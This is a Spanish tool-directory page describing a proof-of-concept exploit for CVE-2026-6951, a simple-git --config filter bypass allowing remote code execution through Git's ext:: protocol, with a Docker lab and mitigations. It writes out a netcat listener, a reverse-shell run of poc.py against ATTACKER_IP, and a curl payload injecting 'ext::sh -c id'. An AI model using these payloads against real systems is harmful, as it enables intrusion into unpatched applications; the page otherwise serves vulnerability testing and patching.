Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-6951 — Prueba de concepto de exploit para CVE-2026-6951, un bypass del filtro --config de simple-git que permite RCE a través del protocolo ext de Git, con un laboratorio Docker y una carga útil de reverse shell. | Kitploit
Herramientas/GitHubGitHub/eqstlab/cve-2026-6951
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubeqstlab/cve-2026-6951

CVE-2026-6951

Prueba de concepto de exploit para CVE-2026-6951, un bypass del filtro --config de simple-git que permite RCE a través del protocolo ext de Git, con un laboratorio Docker y una carga útil de reverse shell.

Ver Repositorio
11hace 1 díaAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-6951 Ejecución Remota de Código en simple-git

★ CVE-2026-6951 PoC de RCE por Bypass del Filtro de la Opción --config de simple-git ★

https://github.com/user-attachments/assets/4c992530-c5bb-4ff4-be5d-af0857eebb67


Descripción general

CVE-2026-6951 es una vulnerabilidad de ejecución remota de código en simple-git causada por una corrección incompleta de CVE-2022-25912. Aunque la opción -c fue bloqueada, la opción equivalente --config no fue restringida adecuadamente. Un atacante que pueda controlar los argumentos de Git puede habilitar el protocolo ext y ejecutar comandos arbitrarios a través de una URL de repositorio ext::.


Versiones afectadas

CategoríaVersión
Vulnerableversiones de simple-git anteriores a 3.36.0
Parcheadasimple-git 3.36.0 o posterior

Este entorno utiliza simple-git 3.35.2 y @simple-git/argv-parser 1.0.3.


Impacto

  • Ejecución remota de código con los privilegios de la aplicación Node.js
  • Divulgación de archivos sensibles
  • Acceso mediante reverse shell
  • Modificación o eliminación de datos de la aplicación

Entorno

Construya y ejecute el entorno vulnerable.

docker build -t cve-2026-6951 .
docker run --rm -d --name cve-2026-6951 -p 9107:9107 cve-2026-6951

Acceda al servicio en:

http://127.0.0.1:9107

Verifique el estado del servicio.

curl -s http://127.0.0.1:9107/api/health

El repositorio de ejemplo integrado está disponible en:

file:///srv/git/sample.git

PoC

Inicie un listener en el sistema del atacante.

nc -lvnp 4444

Ejecute el script de explotación.

python3 poc.py http://127.0.0.1:9107 --lhost ATTACKER_IP --lport 4444

La siguiente solicitud ejecuta el comando id abusando de la opción --config sin restricciones y del protocolo ext de Git.

curl -s -X POST http://127.0.0.1:9107/api/import \
  -H 'Content-Type: application/json' \
  --data-raw '{
    "repository":"ext::sh -c id% >&2",
    "name":"id-check",
    "options":["--config","protocol.ext.allow=always"],
    "environment":{}
  }'

Mitigación

  • Actualice simple-git a la versión 3.36.0 o posterior.
  • No pase opciones de Git controladas por el usuario directamente a simple-git.
  • Permita únicamente esquemas de URL de repositorio de confianza y rechace las URL ext::.
  • Aplique una validación estricta mediante lista de permitidos a las URL de repositorio y a los argumentos de Git.

Análisis

  • KR:
  • EN:
Descargar herramienta